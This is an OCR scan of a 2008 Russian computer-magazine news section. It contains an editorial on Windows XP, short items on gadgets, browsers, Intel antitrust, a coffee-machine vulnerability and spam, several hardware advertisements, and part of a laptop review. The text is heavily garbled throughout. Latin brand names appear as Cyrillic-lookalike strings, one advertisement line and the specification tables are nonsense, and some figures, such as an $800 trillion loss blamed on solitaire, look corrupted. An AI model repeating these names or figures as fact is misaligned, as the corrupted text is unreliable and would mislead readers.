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БЕЛЫМ ПО ЧЕРНОМУ И 
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С 



принтером МІ.-2245 люба 



я печать в 2 раза выгоднее! 



Представьте... профессиональные технологии у Вас на 
с раздельными тонером и барабаном обладает рядом 
на печать снизятся на 50%, скорость увеличится до 22 
на прежнем высоком уровне. Затзипд МЬ-2245. Всегда 



столе. Компактный лазерный принтер Затзипд ІѴИ-2245 
бесспорных преимуществ. Например, Ваши расходы 
страниц в минуту, при этом качество работы останется 
на высоте. 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 
Галерея $ат$ипд: г. Москва, ул. Тверская, д. 9/17, стр. 1. шлл/.затзипд.сот. 







Вот и все, приплыли. 

Первого июля официально прекратились продажи ѴѴіпсІоѵѵзХР — и, хоть в самом этом обстоятельстве нет ничего 
нового, событие получилось символичное: как-никак, смена эпохи. 

ХР стала самой популярной иуспешной операционной системой в миреза все время существования вообще по- 
нятия операционной системы: ей сейчас пользуются не менее полумиллиарда человек. 

И, несмотря на все мои бесконечные симпатии к миру Орепзоигсе и позитивному опыту работы с ІІпіх-системами 
на серверах, десктопе и лэптопе, мне хочется сказать только одно: 

МісгозоН, спасибо за ХР! Это действительно удачная система. 

пікііогг, гл. ред. X 

исіаіііе.ііѵеригпаі.сот 
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МАРИЯ «МІРВІ1Ш» НЕФЕДОВА 

/ мірті.і.@шооіск.ки / 



Обо всем за последний месяц 




Доработанный іРЬопе 



Десятого июня компания Арріе (в лице Стива Джобса) представила свежую 
версиюуже практически культового ІРЬопе. Этого ждали многие и, в общем- 
то, особым секретом планы Арріе не были —добавляли, в основном, те вещи, 
которых не хватало. Новая модельтрубки (36) в первую очередь обзавелась 
поддержкой сетей третьего поколения. Осуществлена поддержка двух стан- 
дартов 65М/Е06Е (850, 900, 1800, 1900 МНД и ІІМТ5/Н50РА (850, 1900, 2100 
МН 7 .}. Скорость передачи данных ощутимо возрастет. Другое серьезное до- 
бавление — 6Р5-приемник, которому особенно порадуются автовладельцы. 
Также нас ждет новая прошивка, версии 2.0. Энергопотребление увеличи- 
лось почти вдвое, и новая модель оснащена более мощным аккумулятором. 
Впрочем, есть и минусы — встроенная камера так и осталась 2-мегапик- 
сельнсй. Подвергся изменениям и сам дизайн. ІРЬопе стал немного толще, 
обзавелся пластиковой «спинкой», призванной улучшить качество связи, 
и металлическими кнопками из «высококачественной стали». В комплект 
телефона теперь входит загадочный «5ІМ е)есіюг іооі» — специнструмент 
для извлечения 5ІМ-карты. 



Пасьянс «КОСЫНКа»! наносит мировой 
экономике ущерб в размере примерно 



$800 трлн 

рабочего времени 



• ежегодно, за счет потери 



Ѵіе\ѵ5опіс радует глаз 



Очередная новинка от всемирно извест- 
ного производителя мониторов не за- 
ставила себя ждать. Компания ѴіеѵѵЭопіс 
анонсировала два дисплея семейства 
ѴХ62, которые прекрасно подойдут гей- 
мерам, а также людям, любящим наслаж- 
даться фильмами на большом экране. 
Девятнадцатидюймовый ѴХ1 962ѵѵт/ р 
— первый на рынке монитор, поддержи- 
вающий при своих размерах разрешение 
1680x1050 в ЕЮ. Прибавим сюда время 
отклика 2 мс, динамическую контраст- 
ность 6000:1 и стереодинамики. Второй 



монитор — 22-дюймовый ѴХ2262ѵѵт/р 
— демонстрирует еще более серьезные 
характеристики: динамическую контраст- 
ность 20000:1, стандартное разрешение 
1680X1050, время отклика 2мс и яркость 
300 кд/кв.м. Обе модели также комплекту- 
ются панелью высокой четкости, которая 
улучшает цветопередачу. А благодаря 
оригинальному дизайну, в котором мато- 
во-черный сочетается с серебристыми 
и пурпурными линиями, ѴХ1962ѵѵт/р и 
ѴХ2262ѵѵт/р будут радовать глаз нетолько 
за счеттехнических достижений. 




в 2008 году процент пиратского ПО среди пользователей Китая, лидера планеты по 
пиратскому софту, снизился с 63% ДО 56% 



► 004 



ХАКЕР 07 /115/ 08 











Предложение для физических лиц — абонентов тарифных планов с предоплатной системой расчетов и стоимостью ѴѴАР-трафика 2, 95 руб. с НДС и более за 10 Кб. 

На другие тарифные планы скидка не распространяется. При подключении скидки стоимость ДО АР-трафика составит 2,95 руб. днем и 1,475 руб. ночью (с НДС за 10 Кб). 
Скидка предоставляется за ежемесячную абонентскую плату в размере 30 руб. с НДС и плату за подключение в размере 10 руб. с НДС. 

Оборудование сертифицировано. Услуги лицензированы. На правах рекламы. 




Билайн - 

живи на яркой стороне 



Ночь в чате удалась! 

Тусовался с друзьями почти до утра, 

ведь теперь на ѴУАР-трафик ночью скидка 50% 



Чтобы получать скидку, набери * 110 * 741 ** г 

Скидка предоставляется с 9 июня по 9 сентября 2008 г. Время действия — ежедневно с 00.00 до 08.00 ч. 



Узнай больше © 06 04 21 

ѵѵѵѵѵѵ.ЪееІіпе.ги 




тед-эпе\/5 




Компания ВеЬоІсІегІпіегпаііопаіисІ. — известный на российс- 
ком рынке производительТѴ-тюнеров — выпустила в продажу 
новую модель: автономный тюнер ВеЬоШ Т V I N Т Р 0 . В отличие 
от других продуктов Вебоісіег, этот ТѴ -тюнер не столь револю- 
ционен и, скорее, — дань рынку. При средней цене в $120 ТѴ 
ІІМТРО есть что противопоставить более дорогим конкурентам. 
ТВ-тюнер предназначен для работы с аналоговыми монито- 
рами и имеет соответственный набор входов/выходов, в том 
числе для подключения внешней аппаратуры. В остальном 
характеристики таковы: метровый и дециметровый диапазон 
программ, максимальное разрешение 1920x1200, поддержка 
стереозвука в стандартах А2/ЫІ САМ, поддержка ѴѴХѲА, функ- 
ция РОЭ, регулируемые шумоподавление и усиление, пульт 
ДУ, полностью русифицированное меню. Так как ТѴ ІЫТРО 
— модель внешняя, немало внимания уделено и дизайну. На 
переднюю панель вынесены кнопки основных функций, а сам 
тюнер выполнен в серебристом цвете. Скромные габариты 
(170x120x30 мм) позволяют расположить новинку как верти- 
кально, так и горизонтально, или даже повесить на стену. 




Самая опасная доменная зона Сети — гонконгская (.Дк) . 

19 , 2 % всех сайтов здесь, так или иначе, опасны для 
пользователя 



Новый звук от ВВК 




ВВК Еіесігопісз Согр. , ПО сообщила о начале выпуска новой группы товаров — компьютерной 
акустики. Новинки ВВК прекрасно исполнят роль многофункциональной акустики при домашнем 
медиа-центре. В линейке будут представлены наборы 2.1 СН и 5.1 СН сактивными сабвуферами. На 
данный момент разработано уже четыре системы — СА-2105, СА-2205, СА-5105, СА-5205. Все они 
изготовлены из МОР и строятся по двухполосной схеме. Но, пожалуй, главная особенность л и ни и за- 
ключается в наличии сразу двух пультов управления — одного ДУ и одного проводного. Это довольно 
логичный ход, так как при работе с компьютером проводной вариантбудетудобнее (особен но учиты- 
вая, что в нем есть входы для наушников и микрофона). Однако ВВК пошли еще дальше и оснастили 
проводные пульты моделей СА-2205 и СА-5205 встроенным ІІ5В-портом. К нему можно напрямую 
подключитьфлеш-плеер или любой другой внешний медианоситель. Таким образом, музыку можно 
слушать и без подключения колонок к ОѴй или компьютеру. 



Борцы 
с пиратс твом 
впадают^Н 

в маразмЕВ 




Порой борцы с сетевым пиратством доходят в своих 
действиях до совершеннейшего абсурда. Совсем 
недавно это было продемонстрировано на красно- 
речивом примере. Амери канские ученые из Универ- 
ситета Вашингтона готовили исследование на тему 
Р2Р-сетей. Вылилась их работа в проверку системы, 
по которой расследовали нарушения распростране- 
ния медиа-контента в Р2Р-сетях. Оказалось, она да- 
леко нетакхороша, какее малюют. С нарушениями в 
этой сфере разбираются Р.І.А.А. (Ресогбіпд Іпсіизігу 
Аззосіаііоп о^ Атегіса), М.Р.А.А. (Моііоп Рісіиге 
Аззосіаііоп о^ Атегіса) и Е.5.А. (Епіегіаіптепі 
5оЙ\л/аге Аззосіабоп). Именно они рассылают про- 
вайдерам, университетам и так далее тысячи тре- 
бований о принятии мер в связи с нелегальным 
распространением продуктов через Р2Р. В ходе ис- 
следован ия ученые вообще неучаствовал и в обмене 
файлами, а лишь мониторили трафик, изучая, кто и 
зачем пользуется ВііТоггепЕом, — но все равно полу- 
чили более 400уведомлений стребованием прекра- 
тить обмен нелегальным контентом. Стало ясно, что 
вышеупомянутые конторы анализируют ІР пользо- 
вателей, но не содержимое передаваемых файлов. 
Заметив странность, исследователи решили немно- 
го отвлечься от основной темы эксперимента и пош- 
ли дальше, присвоив «криминальные» ІР-адреса... 
трем принтерам. Послетого, как М.Р.А.А. потребова- 
ла у принтеров прекратить распространение неле- 
гальных копий «Железного человека» и «Индианы 
Джонса», несовершенство механизма контроля над 
Р2Р-сетями стало более чем очевидно. Учитывая, 
что после подобного «предупреждения» пользова- 
телю грозитуголовное преследование, система явно 
требует доработки. 
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Сепігіпо 



А81ІЗ рекомендует ѴѴіпсіоѵѵз Ѵізіа® Шіітаіе 



Мощность 
а Твоих руках 



Все оттенки звука. Все нюансы цвета. 

Новые 17" ноутбуки А51І5 М70, созданные на базе процессорной технологии ІпіеІ® Сепігіпо® и оснащенные подлинной ОС ѴѴіпсіоѵѵз 
Ѵізіа® Ноте Ргетіит, поддерживают разрешение 1 920 X 1 200, обеспечивая превосходное качество изображения. Ноутбуки А51І5 
М70 откроют для Вас мир РиІІ НО и сделают незабываемыми Ваши впечатления от компьютерных игр и фильмов. 



Всемирная гарантия 2 года 



ѵѵѵѵѵѵ.азиз.ги 



Горячая линия АЗУБ: (495) 23-11-999 



Белый Ветер - ЦИФРОВОМ (495) 730-30-30, Роіагіз (495) 755-55-57, СтартМастер (495) 785-85-55, 8 (800) 555-8-555, Неоторг (495) 223-23-23. 

Москва: АЗІ^ТОИ (495) 585-8045, Артрон (495) 789-85-80, Аваком-М (495) 730-74-54, Аркис (499) 612-9690, ЮИ (495) 5-444-333, МЕХІІЗ (495) 628-23-67, ТепГоІсІ Сгоир (495) 580-6385, ОШІ (495) 221-1111, ПИРИТ (495) 785-55-54, Мерлион (495) 981-84-84, 
Респект (495) 1 77-40-77, Санрайз (495) 788-80-88, ТФК (495) 739-08-28, Ф-Центр (495) 925-6447, ІІЗИ (495) 775-82-02, Санкт-Петербург: АІрНа (812) 320-80-70, ИВСот (812) 329-70-00, Кей (812) 074, Компьютерный мир (81 2) 333-00-33, Микробит (812) 320-80-80, 
СТР Компьютере (812) 542-45-51 , Барнаул: С-Тгасіе (3852) 38-10-00, Владивосток: ДНС (4232) 300-454, Воронеж: РЕТ (4732) 77-93-39, Екатеринбург: Буква (343) 2222-025, Иркутск: ѴѴігагсі (3952) 258-001 , Казань: НоутбукофФ (843) 264-26-01 , Краснодар: 
Владос (861 ) 210-1 0-01 , Санрайз (861 ) 210-00-66, Красноярск: Аверс (3912) 560-561 , Борлас СБ (391 2) 58-09-52, Ноутбум (391 2) 90-1 0-90, Новосибирск: Ноутбум (383) 21 7-39-52, НЭТА (383) 21 6-33-1 1 , Техносити (383) 212-53-33, Ростов-на-Дону: Сотриіег- 
сііу (863) 290-45-90, Центр-Дон (863) 269-86-68, Санрайз (863) 240-11-77, Иманго (863) 232-47-18, Самара: Прагма (846) 270-17-01, Санрайз (846) 241-67-53, Томск: Интант (3822) 56-00-56, Тюмень: Арсенал+ (3452) 797-070, Ай Зузіетз (3452) 22-35-33, 
Челябинск: Сотзегѵіз (351 ) 264-91-91 , Японская электроника (351 ) 247-47-47, Уфа: Кламас (347) 291 -21-12, Форте ВД (347) 260-00-00. 

Іпіеі, логотип Іпіеі, Сепігіпо и Сепігіпо Іпзісіе являются товарными знаками корпорации Іпіеі в США и других странах. 
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Скажи | 
8ат$ит 




Новый телефон отБатвипд Еіесігопісв — 11800 5оиІ — продолжит дело, 
начатое его предшественником 11900. Это более упрощенный вариант 
модели. Он сможет похвастаться 3-мегапиксельной камерой со светоди- 
одной подсветкой, высокоскоростным и-нет браузером, ВІиеІооіИ ѵ.2.0, 
музыкальным плеером, видеорекордером/редактором, а также РМ- ра- 
диоприемником. Встроенная память аппарата насчитывает 1 Гб, и он 
поддерживает карточки тісгоЭО. Свою внешность 11800 унаследовал от 
11900, он тонн о та к же выполнен в цельнометаллическом корпусе и пок- 
рыттонким узором (пять вариантов расцветки). Новая модель не имеет 
дополнительного, сенсорного дисплея, а размер обычного составляет 2". 
Рекомендованная цена девайса на территории России — 1 0.990 рублей. 




Эволюция браузеров 




Соперничество самых популярных в народе браузеров, похоже, не утихнет 
никогда. Орега ЭоіТѵѵаге 1 2-го июня представила новую версию своего 
браузера Орега 9.5. Работы над ней велись более двух лет. Абуквально 
через несколько дней состоялся релиз новой версии Ріге^ох — 3.0. Не за 
горами и выход ІЕ 8 (должен состояться зимой этого года). Кстати, команда 
разработчиков ІЕ прислала Могіііа торт по случаю релиза. Без цианида. 
Несколько слов об Орега 9.5. Браузер впервые за долгое время изменил 
внешний вид, и, по словам разработчиков: «стал интуитивно понят- 
нее». Пользователи, судя по 
первым отзывам, не разделяют 
этого мнения. Междутем, новая 
версия стала быстрее, и у нее 
появилась функция Орега Ыпк, 
при помощи которой можно 
синхронизировать закладки и 
заметки сдругими версиями 
(включая Орега тоЬІІе и Орега 
Міпі). Улучшили и защиту от 
фрауда, малваря и прочих 
«нехороших вещей». Орега ’з 
Егаиб Ргоіесбоп самостоя- 
тельно блокирует вредоносные 
сайты, защищая машину от 
посягательств. Насколько все 
это эффективно и юзабельно, 
можно будет судить через пару 
месяцев. 



Самокопи- 



рующийся принтер 




ЗБ -принтера ми сегодня сложно кого-либо удивить. Онидавноишироко 
используются на производстве и в исследовательских институтах, а еще 
— вполне способны «печатать» различные полезные в хозяйстве вещи. 
Создавая машину РерРар (геріісаііпд га рісі - ргоіоііуре г) , британские конс- 
трукторы из университета Бата думали именно об этом. В самом деле, 
зачем покупать в супермаркете дверную ручку, если ее можно сделать 
дома? Подобной «бытовухи» в нашей жизни много, так что мысли бри- 
танцев развивались в весьма интересном направлении. Ограничиваться 
ручками они не стали. РерРар научили воспроизводить 60% собствен- 
ных деталей, так что принтер способен «напечатать» сам себя (копию, 
например, можно подарить друзьям). Подобный «клон» обойдется в 
300-400 евро (кое-что, все же, придется докупить), и это — учитывая, что 
аппараты такого рода обычно стоят порядка 30.000 евро. Подробнее о 
чудо-машине можно почитать на официальном сайте проекта — 
ЬирѴ/гергар.огд 



Больше всего пиратов в Мс 
і2007 г. здесь было зарегистрировано 



1873 преступления по нарушению 
авторских прав 




Уіпіеіснова 

проблемы! 



Компания Іпіеі постоя иное кем-то судится. Вотитеперьпротивхардварного 
гиганта начато очередное расследование. Іпіеі’ом опятьзаинтересовались 
антимонополисты, на этотраз влицеФедеральнойторговой комиссии США 
(ЕТС). Поводом послужила старая война с АМБ. В ЕТС подозревают, что Іпіеі 
предлагал большие скидки крупным производителям ПК, если те, в свою 
очередь, откажутся отиспользования процессоров АМБ. Не исключено, что 
это правда, ведь Іпіеіуже дважды привлекался по части антимонополии (в 
Японии и Европе). А совсем недавно компанию приговорили к штрафу в 25.4 
млн. долларов власти Южной Кореи, — и именно за большие скидки в обмен 
на отказ от продукции АМ Б. 
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Реклама 







* 



яотеры ВаРИАНт Эксперт на базе _ 1 
•ядернсго процессор? Іпіеі ® Соге?2Ді 
- Это лучшее решение для Вашего офиса! 



Наш Адрес: 394030, г, Воронеж, ул, К,Маркса, 67 
Тел (4732) 512-412, ѵѵмѵѵ.гіагіѵгп.ги 



Ег.схгфч>и ФТНѴіІТМрМІЪ щ Ч яриГГРЛ.ЧГ тъіжж-яу *убищ-#Гі:і , Ч 1 .гіі нм МЕ1ІЛПЧВ.ГЯ мсыі-м^й -|ПРРРИ.1Р«ы "Р *Р^Ч***^ 41=41?" 

■ <*■!*■ гші СК ■№■_ рт ^ іі р іи ? р ЧРТВДНК ■ і^м^ЛЗ^т^гі 



Б ГЦН| і. І-гіг, итртгі ГІІ л ч'в-іігтп щщгтп грмр-чм . и м вджіос^шМѵІ р і 










Правительство ЮАР за последние 3 года 

потеряло более $23,5 млн. в результате 
кибер-атак 



Видеосъемка НН 
как развлечение 



Такой трудоемкий процесс как видеосъемка может в 
будущем превратиться во что-то само собой разуме- 
ющееся, быстрое и удобное. И, по сути, «прекрасное 
далеко» уже здесь — благодаря гаджетам вроде 
Ѵабо Роскеі ѴібеоСат отСгеабѵе. Крохотная видео- 
камера весит всего 90 граммов и способна умес- 
титься на ладони. Эта «малышка» в силах нетолько 
бесперебойнозаписывать видео с разрешением 
640x480 ѴѲА на протяжении двух часов, но и имеет 
встроенное ПО для загрузки отснятого материала 
прямиком на ѴоиТиЬе и РоскеіЬискеЕ Если же эти 
сервисы чем-то тебя не устраивают — нет проблем, 
камера через 115В подключается к компьютеру, как 
обычная флешка. Два гигабайта памяти (ксожа- 
лению, без возможности расширения) и съемный 
аккумулятор также говорят в пользу простоты и 
удобства. В первую очередь гаджеториентирован 
на съемку роликов «от бедра» в формате УоиТиЬе и 
их просмотр на встроенном 2-дюймовом дисплее. 
Сверх-качества ждать, конечно, не стоит, но ведь 
нам далеко не всегда нужно ЕЮ? Ѵабо Роскеіуже 
поступил в продажу. Средняя цена — 3299 рублей. 



МасВоокАіг 
курит^^И 
в сторонке! 




Технологии не стоят на месте, и пальма первенства за разработку 
самого тонкого ноутбука в мире вновь сменила хозяина. На этот раз 
в лидеры в ы рвал ась ко мпанияѴообоо, являющаяся подразделени- 
ем НР. Она представила публике новинку Епѵу 1 33. До этой модели 
самыми малогабаритными ноутбуками на планете считались МасВоок 
Аіг и Еепоѵо ТЫпкРаб Х300, но в сравнение с Епѵу 133 не идет даже 
поделка фирмы Ар ріе. В то время, как тол щи на «яблочного» детища 
составляет 1 .94 см, у Ѵообоо она — всего 1 .8 см (при весе в полтора 
килограмма). Легкая и компактная «игрушка» обладает 1 3.3" дисп- 
леем и комплектуется весьма серьезным I піе I С о ге 2 Оио5Р7500 1.6 
Ѳ Н 2 , 2 Гб оперативной памяти, жестким диском на 80 Гб и видео- 
картой Іпіеі® бгарЫсв Месііа АссеІегаІогХЗІ 00. Присутствуют также 
модули ѴѴІ-РІ 802.1 1 д/п и ВІиеІооЛп 2.0 (ну и другие неотъемлемые на 
сегодня фичи). Удерживает от немедленной покупки, пожалуй, только 
цена. Минимальная стоимость чуда техники составит $2099. 



Кино в кармане 



Все больше и больше компактных решений придумывают инженеры. 
Новый плеер от компании й і д гтт а , МР850, легко помещаясь в карман, 
позволит носить с собой подборку фильмов и музыки. Скажешь, это 
далеко не ново? Верно, только не все плееры такого рода обладают 
3-дюймовым дисплеем с разрешением 480x272 и позволяют смотреть 
фильмы и ролики в форматах АѴІ (в кодировке ОіѵХ и ХѵісІ) и РМѴВ 
без представительной конвертации. Как и другие мультимедийные 
девайсы от йід та, МР850 умеет работать с картинками форматов ірд, 
Ьтр, діі и текстовыми файлами электронных книг. Так что, коротать 
с ним время в поезде, самолете или метро будет еще комфортнее. 
Модель выходит в трех вариантах — на2,4или8Гб, поддерживает 
тісго 5й, имеет встроенный ЕМ-приемники может заряжаться 
прямо от 115В. 
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ВРЕМЯ -ДЕНЬГИ. 

НР ЭКОНОМИТ И ТО И ДРУГОЕ! 

Печатайте, сканируйте, копируйте, отправляйте 
факсы без лишних трат. Вы получите готовый 
документ буквально за несколько секунд. А ори- 
гинальные картриджи НР обеспечат высокое 
качество печати и надежность, проверенную 
десятилетиями. Устройства НР 1_азег|е! «все- 
в-одном» сохранят рабочее пространство в 
вашем офисе и сократят расходы на печать. 
Думайте о бизнесе и не беспокойтесь о печати! 
ѵѵѵѵѵѵ.Нр.гіі/сІа55, тел.: 8 - 800 - 200 - 3-500 



НР І_а$ег|еІ М1522ЫР «Все-в-одном» 

• Все-в-одном: принтер-сканер-копир и факс 

• Скорость печати/копирования - до 23 стр./мин. 

• Нагрузка - до 8 000 страниц (А4) в месяц 

• Наличие сетевого порта для подключения по сети 

• Время выхода первой страницы: менее 9,5 секунд 

• Возможность копирования и отправки факсов 
без компьютера 



2008 НеѵѵІеМ-РаскагсІ ОеѵеІортепІ Сотрапу, І..Р. Все права защищены. На правах рекламы. 







тед-эпе\/5 



Новый 
прокол АОЬ’а 




Свою, не совсем хорошую, репутацию Атегіса Опііпе заслу- 
жила не на пустом месте. За АО Сом всегда водились грешки 
разной степени тяжести, и проклятий в их адрес прозвучало 
предостаточно. Увеличилось ли количество непечатных слов 
после покупки МігаЬІІІз? Еще как. На днях АОЕдоказали, что 
не зря их не любят. Настоящую панику среди сетевого люда 
вызвало появление в контакт-листе I СО странного юзера с 
номером 12111 (или ником « ІСО Зузіепп»]. Этот«контакт из ни- 
откуда» всплыл у 90% пользователей в скором времени после 
падения асечных серверов (что, естественно, только подлило 
масла в огонь). Слух о новой эпидемии и «страшномтрояне» 
тутже разошелся по Сети. Прямо как в детской страшилке про 
черный гроб на колесиках, говорили, что страшный «черный» 
конта ктякобы меняет пароли, ворует ІЛІМ’ы и его срочно нужно 
удалить, поставить в игнор и сменить все, что вообще можно 
сменить. Большинство, конечно, таки поступили. И лишь 
спустя почти день на официальном сайте, наконец, появилось 
опровержение. В нем говорилось, что загадочный 12111 — не 
что иное, как канал связи с ІСО, призванный улучшить комму- 
никацию с пользователями. Встает резонный вопрос — нельзя 
ли было сообщить об этом заранее (где-то в недрах ісц-фору- 
мов, еще в феврале, было сообщение на этутему, но нашли 
его «уже сильно после»), предотвратив панику, развившуюся 
до стадии сообщений по радио и в крупнейших новостных 
лентах? Видимо, нет. 



Сі8СО 8у8І6ШЯ считает, что с 2007 по 

2012 гг. количество ІР-трафика будет удваиваться 
каждые 2 года 




Не МІСГ080Й, так Ооояіе 



Компания УаЬоо долгое время торговалась с МісгозоЙ, пытаясь набить себе цену 
и, в итоге, упустила момент. Сделав последнее предложение о покупке (стои- 
мостью почти 8 млрд, долларов), МісгозоіЧ отступила, заявив, что таким деньгам 
можно найти и более интересное применение. УаЬоо же осталась у разбитого 
корыта — акции компании моментально рухнули в цене на 10% и пришлосьсроч- 
но искать, как реабилитировать положение. Вариант нашелся довольно быстро 
— уже 1 2-го июня было объявлено о подписании договора между УаЬоо и боодіе. 
В рамках этого соглашения УаЬоо будет размещать в своем поисковике часть 
рекламы Гугла. Размер прогнозируемой прибыли должен составить порядка 800 
млн. долларов в год. Сделкой уже заинтересовались антимонопольные органы 
США, так как теперь 90% рекламы в поисковых системах будет контролироваться 
Ѳоодіе. Аналитики предрекают, что МісгозоН теперь переключит внимание на 
другие компании, пытаясь урвать свой кусок на рынке сетевой рекламы. 




Взлом бытовой техники 



Последние годы все больше бытовых приборов оснащают подключением к интернету 
для большего удобства владельцев. Не придется возвращаться домой, опаздывая на 
самолет, чтобы выключить утюг. Или можно сварить себе чашечку кофе, не вставая с 
кресла (потом ее, конечно, все равно придется забрать). Разумеется, рано или поздно 
этим немоглине воспользоваться хакеры. Австралиец Крэйг Райт обнаружил уязви- 
мость для атак кофемашины Іплрге5за-Р90, чем честно поделился с общественностью. 
Дорогущий аппарат ценой примерно $2000 оказался открыт для проникновения со 
стороны, и в машине можно изменить нетолько крепость кофе и количество воды на 
чашку, но и получить через неедоступ к компьютеру пользователя, или учинить атаку 
на буфер обмена. Кстати, изменение дозы кофеина на чашку — это не та к уж забавно; 
для людей с определенными заболеваниями такой напиток вполне может окончиться 
летальным исходом. Защищайте кофеварки фаерволами и своевременно отключайте 
от Сети холодильники! 
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СР! УВЧ! 



Последнее время стало почти привычным читать о новых 
разработках в области робототехники. Из области фан- 
тастики роботы шагнули в реальность. Однако новость, 
пришедшая из США, все равно впечатляет. В июне компания 
Ровіег-МІЦег официально объявила о поставке министерст- 
ву обороны США первого боевого робота МААР5 (М об и Іа г 
Абѵапсеб Аггшеб РоЬоІіс Зузіет]. Планируется, что к 20 14 
году количество дистанционно управляемых боевых машин 
будет равняться уже 1 700 и соотношение живых военных 
к роботам составит 29 к 1 . Одни МААПЗ’ы будут оснаще- 
ны стрелковым, противотанковым, пушечным, а также 
нелетальным оружием. Другие будут отвечать за перевозку 
грузов. Третьи займутся зачисткой территории от мин. Так 
каку солдат подобное соседство пока не вызывает никакого 
восторга, планируется проведение всяческих семинаров, 
курсов и тому подобных вещей, для привития бойцам «куль- 
туры общения с роботами». Стоитзаметить, что МААР5 пока 
что не автономны (до такого технологии еще недошли) — они 
управляются оператором дистанционно, и пока это еще не 
Зкупеі :). Работа над автономными робомашинами, впрочем, 
кипит. Военные вкладывают в разработку огромные деньги. 
Что-то затевается... 



ассылают 



из Северной Америки — 28 %.! 
На втором месте — Россия, от нас 



исходит 



7 % 





Спамеры уходят 
от правосудияН 



Кого сегодня не достали спамеры? Таких людей, пожалуй, 
не осталось. Но при влечь надоедливых рекламщиков к от- 
ветственности — дело крайне непростое. В России за спам 
пока осудили всего один раз (в Пермском крае). Наруши- 
тельтогда отделался формальным штрафом в 5000 рублей. 
Однако прецеденты продолжаются. Так, в Свердловской 
области открыли и закрыли за недостатком уликуголовное 
дело по статье 18 ФЗ «О рекламе». Заявление в милицию 
подала фирма «УралѴІРсилинг», вконец заваленная рек- 
ламой натяжных потолков. В рассылке спама обвинялась 
контора «ДЕКЕ-Урал» (которую и продвигали в назойливых 
письмах), но доказать их причастность не удалось. Ящики, 
с которых приходит спам, меняются слишком быстро. Сооб- 
щения валят валом со всех уголков мира, включая Штаты и 
восточные страны. Ктомуже, зарегистрированы ящики ока- 
зались на доменное имя сіеске.сот . в то время как «ДЕКЕ- 
Урал» обитает в РІІ -сегменте. В таких условиях доказать 
связьзаказчика с рассылкой практически нереально. Вот 
и получается, что «карательные акции»устраивают сами 
измученные пользователи, обрывая заказчикам телефоны и 
заваливая их почту ответными письмами. И-Е 
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КИРИЛЛ АВРОРИН 



МАКСИМУМ МОЩНОСТИ 

С МИНИМУМ люимовн 



ОБЗОР МОЩНЫХ И КОМПАКТНЫХ НОУТБУКОВ 



Мощь процессоров и объемы памяти стремительно растут, но, благодаря стара- 
ниям производителей, они не увеличиваются в размерах. И, что немаловажно, 
не требуют больше питания. Если вчера запуск мощной САО-системы на ноут- 
буке с диагональю экрана менее 14 дюймов был фантастикой, то сегодня это 
вполне возможно. Последние разработки 1МѴГОІА и АТІ в области мобильных 
графических чипсетов привели к тому, что на крохотных компьютерах можно 
запускать даже современные 30-игры. Попробуем разобраться с новинками и 
выбрать лучшие. 



В МЕТОДИКА ТЕСТИРОВАНИЯ 

Длятеста мы выбиралилэптопысдиагональюдисплеяоті 1 до 13 дюймов. Их 
вполне можно отнести к портативным моделям, но нельзя записать в класс саб- 
ноутбуков или, тем более, в класс «замена настольного ПК». Главная задача этих 
ноутбуков — комфортная работа в дороге. При этом они должны минимально 
отличаться по своим возможностям от моделей крупнее. Мы рады заметить, что 
последние год-полтора в лэптопах этого класса появляются производительные 
видеоадаптеры, более-менее приличные динамики и практически всегда мож- 
но обнаружить веб-камеру, нередко — с хорошим разрешением матрицы. 
Притестировании мы использовали набор всем известных программ и тесто- 
вых пакетов. Прогоняли встроенныебенчмарки в архиваторах ѴѴІпРАП 3.80 и 
7-2ір4.57 и высчитывали число Пи в программеЗирегРІ 1.5X5. Время автоном- 
ной работы измерялось в Вайегу Еаіег Рго 2.70 в режиме «классический». Уро- 
вень подсветки выставлялся средний, производительности — минимальный. 




Расчетчисла Пи в большей степени зависит отмощности процессора 



По окончании тестов на производительность мы определяли качество матрицы 
экрана при помощи колориметра. Для демонстрации приведены графики 
каждого ноутбука. Результат понять очень просто: чем ровнее линии, идущие 
по диагонали, тем лучше качество цветопередачи. Разумеется, прямыелинии 
— это идеальная матрица, но слишком большие отклонения дают повод усом- 
ниться в качестведисплея. 



ѴѴШКАК 


ТозЫЬа Рогіеде 
К500 




РоѵегЬоок 

ЫаѵідаІогѴ2і2 

НРРаѵіІіоп 

ІХ2000 




ВепО .ІоуЬоок 
532Ь 




А51І5 ІІ35 




А5У5У2Е 


0 100 200 300 400 500 600 700 800 900 1000 




ШШ 



Примернота же картина наблюдается в тесте ѴѴІпРАР. Вообще, этот 
бенчмарк крайне чувствителен к за грузке системы — небольшая утилитка, 
вроде менеджера подключений, можетлегко отобрать 20-30 баллов итого- 
вого результата 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВЛЕННОЕ 
НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ РОССИЙСКИМ ПРЕД- 
СТАВИТЕЛЬСТВАМ КОМПАНИЙ А51І5, НР, ВЕНО, Т05НІВА И 
К0ѴЕКВ00К 
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Технические характеристики: 

Дисплей: ѴѴХ6А11.1" (1366x768) 

МйУШШУШр : 

ШШШ : 1024 Мб (Максимум 4 Гб) 

ІМ : ШИ№ЙШИ8ШІ 

ОС: МісгозоКѴѴіпсіоѵѵб Ѵізіа Шіітаіе (32-разрядная версия) 

Картридер: 50, ММС, М5 Р МБ Рго р МБ ОІЮ 

Средства коммуникации: модем, бідаЬіІ ЕІЬегпеІ І-АІЧ, 802.11а/Ь/д ѴѴІ_АЫ, 
І ДЦШДНИ 

2 выхода для наушников (один с разъёмом БРйІР), 1 вход для микрофо- 
на, РігеѴѴіге, ЕхргеззСагё 

Дополнительно: кнопка смены режима производительности, ѴѴеЬ-каме- 

ра, встроенный ми^ИЩЦ 

ШМЙВШИІ 

ШДІШШі : 2ШШЙШ8ІШ 



о о 




49 000 руб. 



Ві 



Технические характеристики: 

И—вЛ : 

Видеоадаптер: 

імііушіііі : 

ШІ з Гб ( М а кси му м 3 Гб ) 

Н 00: БАТА 250 Гб 

ОС: ІЯ і іб Ь :с- й^)1 

иіи ии и ни 

Внешние порты ввода-вывода: ЗХІ1БВ2.0, Ѵ6А, НЮМІ, К.Ж, ВІ45»5-ѵісІео, 
лівтамодшляінамш ниікавітвабошдяяім ішиашииаіі Е^ 

Дополнительно: кнопка смены режима производительности, кнопка 

ИВВ9БВВВ^^^^^^ШИ99НШШ9ШВШВВЕШВ&іібіИ 

ѴѴеЬ-камера, встроенный микрофон 

ШШШЯЯ 

Размеры: 32x24x3см 




